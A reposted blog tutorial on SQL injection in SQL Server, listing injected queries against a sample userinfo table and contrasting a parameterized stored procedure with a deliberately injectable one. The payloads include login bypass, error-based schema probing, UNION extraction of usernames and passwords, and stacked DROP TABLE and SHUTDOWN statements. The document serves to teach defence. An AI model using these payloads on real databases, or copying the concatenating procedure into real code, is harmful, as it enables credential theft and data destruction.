  • SQL注入攻击<收藏>

    --SQL注入攻击
    -- Each SELECT below shows the statement the server ends up running when an
    -- application pastes user input directly between the quotes of
    -- userName='...' / userPwd='...'. In T-SQL everything after -- is a comment,
    -- so the closing quote the application appends is ignored.
    -- The root fix for every case is the same: bind input as parameters, never
    -- concatenate it into the statement text.

    -- Log in as any user (prevention: use parameterized queries)
    select * from  dbo.userinfo where userName='' and userPwd=''or 1=1--'
    select * from  dbo.userinfo where userName=''or 1=1--'
    -- View every row, not only VINET's: OR 1=1 makes the WHERE condition always true
    select * from  dbo.userinfo where userID='VINET' OR 1=1
    -- Log in with a known member name: the password check is commented out
    select * from  dbo.userinfo where userName='admin '--'
    -- Use error messages to obtain information step by step (prevention: custom error page)
    -- NOTE(review): a generic error page only reduces what is leaked; the query
    -- is still injectable until the input is bound as a parameter.
    select * from  dbo.userinfo where userName=''HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName,UserPwd HAVING 1=1--'
    -- Insert a row into the table using the data learned from the errors above (succeeded!)
    -- NOTE(review): this and the DROP / SHUTDOWN cases below succeed only if the
    -- application's database login holds those rights; a login limited to what
    -- the application needs contains the damage.
    select * from  dbo.userinfo where userName='';INSERT INTO userinfo Values('hacker','hacker')--'
    -- Destructively drop a table
    select * from  dbo.userinfo where userName='';drop table dbo.Hello--'
    -- Obtain user account information step by step
    select * from  dbo.userinfo where userName=''UNION SELECT 'abc',1,1 FROM userinfo --' -- check the column types
    select * from  dbo.userinfo where userName=''UNION SELECT 1,1,1 FROM userinfo --' get the column header fields
    select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,1 FROM userinfo WHERE UserName>'a'--' -- get all account names
    -- NOTE(review): the next query returns userPwd as stored; presumably the
    -- column holds plaintext passwords (confirm). Storing only salted password
    -- hashes limits what such a read exposes.
    select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,userPwd FROM userinfo where UserName>'a'--' -- get account password information

    -- Stop the service (given sufficient privileges) (;DROP Database D_Name --, ;DROP TABLE T_Name --)
    select * from  dbo.userinfo where userName='' ;SHUTDOWN--'
    --


    -- Ordinary call to the parameterized procedure: both values are bound as data.
    exec dbo.SafeQueryCustomers 'l','l'
    -- Call to the concatenating procedure with a crafted password value.
    -- NOTE(review): as written the second literal is '' (empty string) and
    -- "or 1=1" sits outside it; presumably the intent is to show the value
    -- ' or 1=1 -- being passed as @userPwd. Confirm against the original post.
    exec dbo.SafeQueryCustomers2 'l','' or 1=1 --'

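    -- Searches dbo.userinfo with optional substring filters on userName and
    -- userPwd. The WHERE clause text is assembled only from fixed fragments;
    -- the caller's values reach the server through sp_executesql parameters
    -- (@puserName / @puserPwd), so they are treated as data and never parsed
    -- as SQL.
    --
    -- @userName  substring to match in userName; NULL = no filter on userName
    -- @userPwd   substring to match in userPwd;  NULL = no filter on userPwd
    --
    -- Caveats for reviewers:
    --   * LIKE wildcards (%, _, [ ]) inside the input still act as wildcards,
    --     and an empty string matches every row. That is not injection, but
    --     it means this procedure must not be used as a login check.
    --   * SELECT * returns every column of dbo.userinfo to the caller,
    --     presumably including userPwd (confirm against the table definition).
    CREATE PROCEDURE dbo.SafeQueryCustomers
     (
     @userName nvarchar(30),
     @userPwd nvarchar(12)
     )
    AS
        DECLARE @STR nvarchar(255)
        DECLARE @WK nvarchar(255)
        -- Two characters wider than the inputs so that wrapping a full-length
        -- value in % ... % is not silently truncated (which would drop the
        -- trailing wildcard and change the match).
        DECLARE @likeName nvarchar(32)
        DECLARE @likePwd nvarchar(14)
        SET @STR = 'SELECT * FROM dbo.userinfo'
        SET @WK = ''

        IF @userName IS NOT NULL
        BEGIN
           SET @WK = @WK + ' userName LIKE @puserName AND  '
           SET @likeName = '%' + @userName + '%'
        END

        IF @userPwd IS NOT NULL
        BEGIN
           SET @WK = @WK + ' userPwd LIKE @puserPwd AND  '
           SET @likePwd = '%' + @userPwd + '%'
        END

        -- Test @WK, not @STR: @STR is never empty, so the original check always
        -- took this branch and SUBSTRING received a negative length when both
        -- inputs were NULL.
        IF LEN(@WK) > 0
        BEGIN
           -- LEN ignores trailing spaces, so this strips the final ' AND'.
           SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
           -- A parameter that the statement does not reference is allowed, so
           -- both are always declared and passed.
           exec sp_executesql @STR,
                N'@puserName nvarchar(32),@puserPwd nvarchar(14)',
                @puserName=@likeName,@puserPwd=@likePwd
        END
        ELSE
           exec sp_executesql @STR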
    =============================================

    -- Counterexample: despite the "Safe" prefix, this variant is injectable and
    -- is shown for contrast with dbo.SafeQueryCustomers. It concatenates
    -- @userName and @userPwd into the statement text, so a quote character in
    -- either value ends the string literal and the rest is parsed as SQL.
    -- Calling sp_executesql does not help by itself; the protection comes from
    -- passing values as sp_executesql parameters, which this version never does.
    -- The nvarchar(30) / nvarchar(12) length limits are not a defence either:
    -- the value used in the exec example on this page fits within 12 characters.
    -- Do not deploy this form.
    CREATE PROCEDURE dbo.SafeQueryCustomers2
     (
     @userName nvarchar(30),
     @userPwd nvarchar(12)
     )
    AS
        DECLARE @STR nvarchar(255)
        DECLARE @WK nvarchar(255)
        SET @STR = 'SELECT * FROM dbo.userinfo'
        SET @WK = ''
       
        IF NOT @userName IS NULL 
        BEGIN
           -- Unsafe: caller-supplied text becomes part of the SQL statement.
           SET @WK = @WK + ' userName LIKE ''%' +@userName + '%'' AND  ' 
        END  
       
        IF NOT @userPwd IS NULL    
        BEGIN
           -- Unsafe: same concatenation for the password filter.
           SET @WK = @WK + ' userPwd LIKE ''%' +@userPwd + '%'' AND  '
          
        END  
         -- NOTE(review): @STR was set to a non-empty literal above, so this
         -- condition is always true and the ELSE branch is unreachable; with
         -- both inputs NULL, @WK is empty and SUBSTRING gets a negative length.
         -- The check was presumably meant to be on @WK.
         IF LEN(@STR) > 0
        BEGIN
           -- LEN ignores trailing spaces, so this strips the final ' AND'.
           SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
           -- Executes the concatenated text with no parameter list.
           exec sp_executesql @STR
        End  
        ELSE
           exec sp_executesql @STR


  • 原文地址:https://www.cnblogs.com/Golf9527/p/1558711.html